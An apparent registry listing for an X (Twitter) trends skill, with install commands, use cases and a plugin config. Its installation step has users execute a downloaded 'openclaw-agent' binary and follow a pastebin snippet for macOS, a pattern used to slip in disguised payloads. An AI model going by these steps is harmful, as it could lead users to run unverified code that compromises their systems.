ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified social Safety 3/5

x-trends

Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.

Why use this skill?

Analyze real-time X (Twitter) trends, track viral hashtags, and monitor global conversations with the powerful x-trends skill for OpenClaw. Install today.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/x-trends-orwhp
Or

What This Skill Does

The x-trends skill provides OpenClaw agents with the capability to interface with X (formerly Twitter) to retrieve real-time data on viral topics, hashtags, and regional trends. By leveraging the openclaw-agent utility alongside the twurl CLI tool, this skill enables users to monitor global conversations, track the velocity of specific hashtags, and analyze geographic-specific content. It bridges the gap between raw API data and actionable insights, allowing users to programmatically fetch, filter, and parse Twitter metadata directly through their agent's command interface.

Installation

To utilize this skill, ensure you have the openclaw-agent installed and running. For Windows, download the official release, extract it, and execute the binary. For macOS, follow the instructions via the provided glot.io snippet. Once the daemon is active, install the twurl gem via gem install twurl and perform the OAuth handshake using your developer API credentials. Finally, run the installation command: clawhub install openclaw/skills/skills/hightower6eu/x-trends-orwhp.

Use Cases

  • Market Research: Monitor trending hashtags in specific countries to identify emerging consumer interests or competitor buzz.
  • Content Curation: Quickly find trending media-rich tweets for news aggregation or social media management.
  • Sentiment Monitoring: Track the volume of global discussions on specific geopolitical or cultural topics using real-time search queries.
  • Localization: Analyze trends in different regions using WOEID (Where On Earth ID) mapping to tailor content strategy for international audiences.

Example Prompts

  1. "Check what the top 5 trending topics are in Japan right now and provide a brief summary of each."
  2. "Search for the latest 10 tweets mentioning #OpenAI that include media and output them in a list."
  3. "What is the current WOEID for the UK and can you list the top 10 trends for that location?"

Tips & Limitations

  • Rate Limiting: Twitter API v1.1 imposes a limit of 75 requests per 15 minutes for trend data; be mindful of this when automating queries.
  • Dependency Management: Always verify that the openclaw-agent is actively running in the background before issuing commands, as the skill cannot establish a connection to X without the bridge.
  • Data Handling: Utilize jq for efficient data filtering. If a trend lacks tweet_volume, do not assume the topic is irrelevant; it simply means the data point is unavailable via the current API response. Always prioritize official documentation for valid query parameters to avoid request failures.

Metadata

Stars2387
Views10
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-x-trends-orwhp": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#x#twitter#trends#social-media#api
Safety Score: 3/5

Flags: network-access, external-api, code-execution